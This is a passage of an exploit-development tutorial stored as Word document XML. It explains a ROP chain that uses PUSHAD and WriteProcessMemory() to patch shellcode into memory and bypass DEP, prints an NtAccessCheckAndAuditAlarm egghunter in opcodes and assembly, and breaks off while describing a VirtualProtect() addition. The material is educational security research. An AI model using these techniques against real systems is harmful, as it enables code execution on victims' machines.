    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So the CALL ESI will jump to that location, increase ESP with 4 bytes, put a value (06454ED5) into EAX and then return. We simply "return to the caller – to the stack", basically taking the pointer off the top of the stack (= pointer to the next rop gadget) and jump to it)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4962525" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="Image59" descr="">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descr="">
                      <a:hlinkClick r:id="rId161"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId160"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4962525" cy="638175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Using this gadget, ESI is set to FFFFFFFF. This will be the value used as hProcess parameter later on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Next, CCD07263 is popped into eax, and after that, a SUB EAX,ECX instruction is executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4972050" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="Image60" descr="">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
                      <a:hlinkClick r:id="rId163"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId162"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4972050" cy="866775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After executing those instructions, the result in EAX will be 7C802213 (which is the pointer to kernel32.WriteProcessMemory)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3286125" cy="1209675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61" name="Image61" descr="">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descr="">
                      <a:hlinkClick r:id="rId165"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3286125" cy="1209675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finally, a PUSHAD instruction is executed :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4562475" cy="333375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62" name="Image62" descr="">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descr="">
                      <a:hlinkClick r:id="rId167"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4562475" cy="333375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This will make the top of the stack look like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3333750" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63" name="Image63" descr="">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descr="">
                      <a:hlinkClick r:id="rId169"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3333750" cy="1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the pushad function returns, it will execute the instructions at 0x0647BD7C (which originate from EDI, placed into this register using the 5 POP’s earlier)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This instruction will simply do a CALL EAX.  In EAX, we still have a pointer to kernel32.WriteProcessMemory().  When the CALL EAX is made, the following parameters are taken from the stack :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5781675" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="Image64" descr="">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descr="">
                      <a:hlinkClick r:id="rId171"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5781675" cy="1133475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The first parameter does not really matter. The code will patch WPM(), so it will never return.  Then, the hProcess parameter (FFFFFFFF) and Address (destination, where to write the shellcode to) can be found, followed by the Buffer (location of the shellcode. This pointer was taken from ESP. Since PUSHAD also shifted ESP (and since we have placed our shellcode directly after the rop chain), this pointer now points to the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The BytesToWrite value was generated earlier.  Finally, the last parameter just points to a writeable location.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>First, dump the contents at 0x78022CF :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2819400" cy="2238375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65" name="Image65" descr="">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descr="">
                      <a:hlinkClick r:id="rId173"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId172"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2819400" cy="2238375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Press F7 to step through. After the call to ntdll.ZwWriteVirtualMemory is made (at 7C8022C9), before the RETN 14 instruction is executed at the end of that call, we see that our shellcode was copied to 7C8022CF :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2771775" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="66" name="Image66" descr="">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6" descr="">
                      <a:hlinkClick r:id="rId175"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId174"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2771775" cy="2447925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the RETN 14 instruction is executed, we land nicely at 7C8022CF, which just is the next instruction in the natural flow of WriteProcessMemory().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Since this location now contains shellcode, the shellcode will get executed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3381375" cy="2152650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="Image67" descr="">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7" descr="">
                      <a:hlinkClick r:id="rId177"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId176"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3381375" cy="2152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3181350" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="68" name="Image68" descr="">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8" descr="">
                      <a:hlinkClick r:id="rId179"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId178"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3181350" cy="2162175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Conclusion : in this ROP exploit, a different technique was used to put the parameters on the stack. The parameters were first generated (using ADD and SUB instructions) and popped into registers. Finally, a PUSHAD instruction puts the instructions in the right place, and the call to the API is made.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="egghunters"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr/>
        <w:t>Egghunters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>tutorial 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>, I have discussed the internals of egghunters. Summarizing the concept of an egg hunter, you will need to be able to execute a small amount of code, which will look for the real shellcode (on the stack or in the heap) and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You should already know how to get an egg hunter to run, using rop.  An egghunter is just some "small" shellcode, so you should just apply a rop sequence to make the egg hunter run.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the egg hunter has found the shellcode, it will jump to the base address of the shellcode.  Of course, when DEP is enabled, this will most likely not work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>That means that we need to insert a second rop chain, to make sure we can mark the shellcode as executable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>There are 2 ways to do this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">append a rop routine to the egg hunter itself </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">prepend the final shellcode with a rop routine </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Let’s take a look at how these 2 scenario’s should be implemented, using a commonly used egg hunter (using NtAccessCheckAndAuditAlarm)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681CAFF0F   or dx,0x0fff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42          inc edx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52          push edx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6A02        push byte +0x2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58          pop eax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CD2E        int 0x2e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3C05        cmp al,0x5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5A          pop edx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74EF        je xxxx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B877303074  mov eax,0x74303077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8BFA        mov edi,edx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AF          scasd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75EA        jnz xxxxxx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AF          scasd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75E7        jnz xxxxx      </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 xml:space="preserve">FFE7        jmp edi         </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Again, I assume you already know how to get this egg hunter to run using rop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As you can see, at the end of this egg hunter (when the shellcode was found), the address of the shellcode will be stored in edi.  The last instruction of the egg hunter will jump to edi and attempt to execute the shellcode.  When DEP is enabled, the jump will be made, but the execution of the shellcode will fail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>How can we fix this ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="patch"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr/>
        <w:t>Scenario 1 : patch the egg hunter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In this first scenario, I will modify the egg hunter to make sure that the location where the shellcode is located, gets marked as executable first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The "jmp edi" instruction (which will make the jump) needs to be removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Next, we have to mark the memory where the shellcode is, as executable. We can do this by calling VirtualProtect().  Luckily, we don’t have to use ROP this time, we can simply write the code in asm and append it to the egg hunter. It will get executed just fine (because the current location is already executable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The additional code that needs to be written, needs to craft the following values on the stack :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">return address : this is the address in edi – pointing to the shellcode. This will make sure the shellcode will get executed automatically after the call to VirtualProtect() returns </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">lpAddress : same address as "return address" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">size : shellcode size </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
